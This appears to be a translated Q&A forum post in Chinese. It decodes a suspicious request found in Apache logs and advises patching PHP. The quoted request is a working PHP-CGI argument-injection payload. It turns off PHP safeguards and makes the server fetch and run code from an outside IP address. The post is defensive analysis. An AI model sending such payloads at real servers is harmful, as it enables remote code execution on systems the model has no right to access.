/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
其中很多都在我的 apache 日志中创建 404,它看起来可能像 PHP hack 尝试?
对我来说,这看起来确实像是一次黑客攻击。
一些系统支持向 CGI 脚本提供字符串数组的方法。这仅在“索引”查询的情况下使用。这由“GET”或“HEAD”HTTP 请求标识,其 URL 搜索字符串不包含任何未编码的 = 字符。
URL 解码的查询字符串如下所示:
/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt
这些都是-d
开关,用于定义php.ini
指令。基本上,这就是它的变化:
safe_mode=off
disable_functions=null
allow_url_fopen=on
allow_url_include=on
最后,auto_prepend_file=http://61.19.253.26/echo.txt
该指令包含位于http://61.19.253.26/echo.txt
index.php 中的 PHP 代码并在其代码之前执行它。
echo.txt
托管在泰国某处的 Web 服务器上,并包含<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>
. 这可能用于检查您的服务器是否容易受到攻击。
如果您使用 Apache mod_cgi
/mod_cgid
运行 5.3.13 之前的 PHP 版本和 5.4.3 之前的 5.4.x,请立即更新:http ://www.php.net/downloads.php